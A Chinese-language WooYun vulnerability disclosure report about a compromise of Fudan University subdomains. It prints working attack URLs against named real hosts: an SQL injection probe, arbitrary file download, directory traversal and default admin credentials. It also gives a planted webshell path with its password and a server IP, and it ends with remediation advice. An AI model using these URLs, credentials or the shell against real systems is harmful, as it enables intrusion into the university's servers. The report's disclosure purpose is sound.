漏洞概要
关注数(24)
关注此漏洞
漏洞标题:复旦大学某二级域名沦陷已GetShell
提交时间:2015-05-06 11:45
修复时间:2015-05-11 11:46
公开时间:2015-05-11 11:46
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
Tags标签:
无
漏洞详情
披露状态:
2015-05-06: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
1.复旦大学某学院内容发布系统弱口令(泄露领导及用户信息)
2.复旦大学后台管理地址批量泄露(加弱口令)
详细说明:
1. Cid没有过滤直接带入数据库查询,导致注入
http://www.ias.fudan.edu.cn/Circs/Default.aspx?Cid=298%27
2.任意文件下载
http://www.ias.fudan.edu.cn/File.aspx?filepath=File.aspx
3.存在fck,利用iis 6.0解析漏洞直接Getshell
获得shell地址
文件目录遍历
http://www.physics.fudan.edu.cn/tps/sites/phygsu/newtest/editor/admin_uploadfile.asp?id=14&dir=../..
Admin admin 默认账号给密码,目录遍历
附上多个管理地址:
收集如下二级域名
以上很多站都解析服务器 202.120.224.114
权限是sa,可继续内网渗透
漏洞证明:
http://www.ias.fudan.edu.cn/userfiles/file/ok.asp/1%281%29.jpg 密码-7
修复方案:
1. 修改apache配置文件禁止列目录
2. 任意文件下载,加上严格的判断控制
3. iis 6.0 建议更换版本升级,服务器可以使用第三方软件(安全狗,护卫神)
4. 后台目录多个泄露,加验证码防止爆破,
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-05-11 11:46
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无
漏洞评价:
评论